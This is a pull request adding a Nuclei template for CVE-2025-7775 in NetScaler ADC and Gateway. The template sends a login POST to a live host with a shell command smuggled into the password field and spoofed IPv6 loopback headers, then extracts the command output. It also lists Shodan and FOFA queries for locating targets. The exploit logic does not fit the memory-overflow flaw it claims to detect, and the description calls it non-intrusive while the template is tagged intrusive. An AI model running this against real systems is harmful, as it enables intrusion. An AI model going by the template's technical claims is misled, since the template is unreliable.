### PR TITLE
Add template for CVE-2025-7775 detection

### DIFF
--- a/http/cves/2025/CVE-2025-7775.yaml
+++ b/http/cves/2025/CVE-2025-7775.yaml
@@ -1,0 +1,85 @@
+id: CVE-2025-7775
+
+info:
+  name: NetScaler ADC & Gateway - Remote Code Execution
+  author: abcds07
+  severity: critical
+  description: |
+    NetScaler ADC and NetScaler Gateway 13.1, 14.1, 13.1-FIPS, and NDcPP contain a memory overflow vulnerability in Gateway and LB virtual servers bound with IPv6 services, letting attackers cause remote code execution or denial of service, exploit requires specific server configurations.
+  reference:
+    - https://github.com/hacker-r3volv3r/CVE-2025-7775-PoC
+    - https://github.com/mezo0x4/CVE-2025-7775
+    - https://github.com/mezo0x4/CVE-2025-7775-PoC
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-7775
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-7775
+    cwe-id: CWE-119
+    epss-score: 0.47837
+    epss-percentile: 0.97647
+    cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: citrix
+    product: netscaler_application_delivery_controller
+    shodan-query:
+      - title:"NetScaler Gateway"
+      - title:"NetScaler AAA"
+      - http.favicon.hash:-1292923998
+      - http.favicon.hash:-1166125415
+    fofa-query:
+      - title="NetScaler Gateway"
+      - title="NetScaler AAA"
+      - icon_hash="-1292923998"
+      - icon_hash="-1166125415"
+  tags: cve,cve2025,netscaler,citrix,rce,kev,intrusive
+
+variables:
+  marker: "{{rand_text_alpha(8)}}"
+  cmd: "echo {{marker}}"
+
+http:
+  - raw:
+      - |
+        GET /p/u/doAuthentication.do HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+
+    extractors:
+      - type: regex
+        name: csrf_token
+        part: body
+        group: 1
+        regex:
+          - 'name="csrf_token"\s+value="([^"]+)"'
+        internal: true
+
+  - raw:
+      - |
+        POST /p/u/doAuthentication.do HTTP/1.1
+        Host: {{Hostname}}
+        X-Forwarded-For: [::1]
+        X-Real-IP: [::1]
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: {{len('login=admin&password=' + cmd + '&domain=test&csrf_token=' + csrf_token)}}
+
+        login=admin&password={{cmd}}&domain=test&csrf_token={{csrf_token}}
+
+    matchers:
+      - type: dsl
+        name: rce_detection
+        dsl:
+          - 'contains(body, "{{marker}}")'
+          - 'status_code == 200'
+          - 'contains(to_lower(header), "application/vnd.citrix.authenticateresponse")'
+          - '!contains(to_lower(body), "invalid")'
+          - '!contains(to_lower(body), "error")'
+        condition: and
+
+    extractors:
+      - type: dsl
+        name: command_output
+        dsl:
+          - body


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2025-7775 - NetScaler ADC & Gateway Remote Code Execution template
- References: https://github.com/hacker-r3volv3r/CVE-2025-7775-PoC, https://github.com/mezo0x4/CVE-2025-7775, https://github.com/mezo0x4/CVE-2025-7775-PoC

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

#### Additional Details

Template focuses on RCE detection through IPv6 memory overflow vulnerability in NetScaler ADC/Gateway. Uses strict DSL matchers to detect command execution via authentication endpoint with IPv6 headers. Properly handles CSRF token extraction and reuse. Non-intrusive validation approach.

/claim https://github.com/projectdiscovery/nuclei-templates/issues/13025

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)